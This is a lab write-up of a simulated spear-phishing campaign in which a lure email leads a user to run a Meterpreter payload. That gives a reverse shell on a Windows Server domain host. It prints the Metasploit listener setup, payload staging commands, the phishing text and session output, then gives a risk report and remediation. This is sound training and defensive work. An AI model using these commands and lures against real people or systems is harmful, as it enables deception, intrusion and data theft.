okoroe845-create/-Advanced-Spear-Phishing-Post-Exploitation-Simulation

# 🎭 Full-Lifecycle Spear-Phishing & Active Directory Node Takeover ### Performed by: Okoro Francis Emmanuel **Target Audience:** Cybersecurity Technical Reviewers & Executive Leadership ## 📌 Executive Summary & Project Overview ### High-Level Business Context In modern corporate environments, technical defenses (firewalls, encryption, antivirus) are heavily prioritized, yet **human behavior** remains the most targeted operational vulnerability. This project demonstrates a comprehensive, full-lifecycle simulation of a targeted **Spear-Phishing Campaign** and subsequent **Post-Exploitation Command & Control (C2)** operation. By executing both the offensive staging and simulating the internal user actions, this lab maps out how a single, high-urgency email can bypass perimeter boundaries, deceive an employee, and grant an external attacker administrative-level access to a corporate Windows Server domain asset. ### Core Objectives: * Validate the efficacy of email security filters against targeted HTML-pretext messages. * Analyze user vulnerability to urgent social engineering pretexts. * Demonstrate the critical business risk of unmonitored inbound reverse TCP connections. * Map out systematic post-exploitation host discovery workflows. ## 🛠️ Tooling & Infrastructure Breakdown To carry out this end-to-end audit, a sophisticated dual-environment lab was configured to replicate an enterprise environment: | Tool / Component | Function in Project | Business / Technical Impact | | :--- | :--- | :--- | | **Kali Linux** | Bare-Metal Attacker Infrastructure | Dedicated security environment hosting tools and listeners. | | **Social-Engineer Toolkit (SET)** | Spear-Phishing & Mass E-Mailer Engine | Automates attack pretexts, spoofing, and deployment targeting. | | **Metasploit Framework (MSF)** | Command & Control (C2) Listener | Handled payload staging, reverse handshakes, and interactive shells. | | **Apache2 Web Server** | Host Malicious Assets Locally | Served as the external file delivery system over port 80. | | **Meterpreter** | Advanced In-Memory Payload | Evades disk signatures by running inside active RAM memory. | | **Windows Server 2016** | Active Directory Node (`MS10`) | The target server asset within the `structurereality` domain. | ## 💻 Step-by-Step Technical Execution The simulation was performed chronologically across four highly calculated tactical phases: ### Step 1: C2 Listener Initialization Before sending any malicious emails, the receiver infrastructure must be listening. An exploit handler was set up in Metasploit to wait for incoming connections over secure web ports (`443`). msf6 > use multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.1.1.66 msf6 exploit(multi/handler) > set LPORT 443 msf6 exploit(multi/handler) > set ExitOnSession false msf6 exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] Started reverse TCP handler on 10.1.1.66:443 ### Step 2: Payload Staging & Server Setup A malicious executable wrapper (`payload.exe`) was compressed into an update archive to bypass basic network firewalls scanning for raw `.exe` extensions, then moved to the web service directory. # Navigate to core configuration toolkit files cd /root/.set # Compress payload executable into deployment zip archive zip /var/www/html/acctupd.zip payload.exe # Spin up local Apache web server infrastructure to host the archive service apache2 start ### Step 3: Spear-Phishing Attack Deployment Using SET's automated mass mailer module, a targeted email was crafted using high-urgency pretexting to force immediate user compliance. * **Target Destination:** `jaime@structurereality.com` * **Spoofed From:** `support@structurereality.com` (Display: `Support Department`) * **Subject:** `Important Account Update` #### HTML Phishing Pretext Used: Please download, extract, and run the update file from this link: update
Otherwise, your certs will automatically expire!
Sincerely,
Support Department ### Step 4: Simulating the Victim Actions & Reconnaissance To thoroughly map the impact, I shifted to my local Windows host and took on the role of the victim: 1. Opened the incoming phishing link via the browser. 2. Downloaded the `acctupd.zip` container from the local server (`10.1.1.66`). 3. Extracted the files and ran the payload binary. Instantly, the execution triggered a stable reverse TCP handshake back to my Kali Linux terminal, opening an interactive **Meterpreter shell**: [*] Sending stage (175686 bytes) to 10.1.1.2 [*] Meterpreter session 1 opened (10.1.1.66:443 -> 10.1.1.2:1687) msf6 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > Once inside, I executed host discovery commands to verify the depth of network access: meterpreter > sysinfo Computer : MS10 OS : Windows 2016+ (10.0 Build 14393). Architecture : x64 Domain : structurereality Logged On Users : 6 meterpreter > getuid Server username: structurereality\jaime ## 🚨 Vulnerability & Risk Report Below is the risk breakdown found during the audit, prioritized by operational threat level to business continuity. ### 🔴 CRITICAL — Complete Node Compromise via Untrusted Executables * **Threat Type:** Execution of Arbitrary Unsigned Binaries * **Technical Severity:** High (Meterpreter Access Achieved) * **Business Impact:** High risk of data exfiltration, ransomware distribution, or complete network pivot. An outside attacker gained a footprint on domain asset `MS10` under account context `structurereality\jaime`. ### 🟡 MEDIUM — High-Urgency Email Fraud Acceptance * **Threat Type:** Social Engineering & Impersonation Deception * **Technical Severity:** Medium * **Business Impact:** Bypasses mechanical security controls entirely. Lack of user awareness or internal verification policies allows outside entities to spoof trusted personnel effectively. ### 🟢 LOW — Outbound Port Egress Over Non-Standard Services * **Threat Type:** Lax Egress Firewall Filtering * **Technical Severity:** Low * **Business Impact:** Internal devices are permitted to establish arbitrary connections outward over port `443`. This makes it trivial for backdoor payloads to establish stable outbound links back to attacker infrastructure. ## 🧠 Key Lessons Learned 1. **Defense-in-Depth Is Mandatory:** Mechanical perimeters are useless if users are tricked into downloading and running programs locally. Security must exist at the endpoint level, not just the firewall. 2. **The "Human Patch" is Hardest:** Technical controls must be backed by a strong internal security posture where employees are trained to double-check strange, high-urgency notifications. 3. **Internal Telemetry Matters:** Outbound connections should be strictly limited. If a regular workstation starts establishing raw binary handshakes over secure channels, internal security teams should be alerted immediately. ## 🚀 Forward Strategic Roadmap This offensive simulation forms the foundation for three upcoming, defensive verification cycles: ### Phase 1 — Exploitation Expansion * Leverage the existing `structurereality\jaime` session footprint to test local permission limits. * Attempt internal credential harvesting to see if higher administrative domain tokens are exposed in memory. ### Phase 2 — System Hardening & Controls Remediation * **AppLocker Policy Integration:** Configure application control rules to completely block users from launching unknown, unsigned software inside temporary browser directories. * **Egress Traffic Restrictions:** Restrict corporate devices so they can only connect outward to known, trusted web domains, crippling unauthorized reverse TCP links. ### Phase 3 — Continuous Security Pipeline Training * Progressing through the **TryHackMe Jr. Penetration Tester** path. * Building out hands-on offensive and defensive infrastructure as a part of a dedicated **eJPT / OSCP** study plan.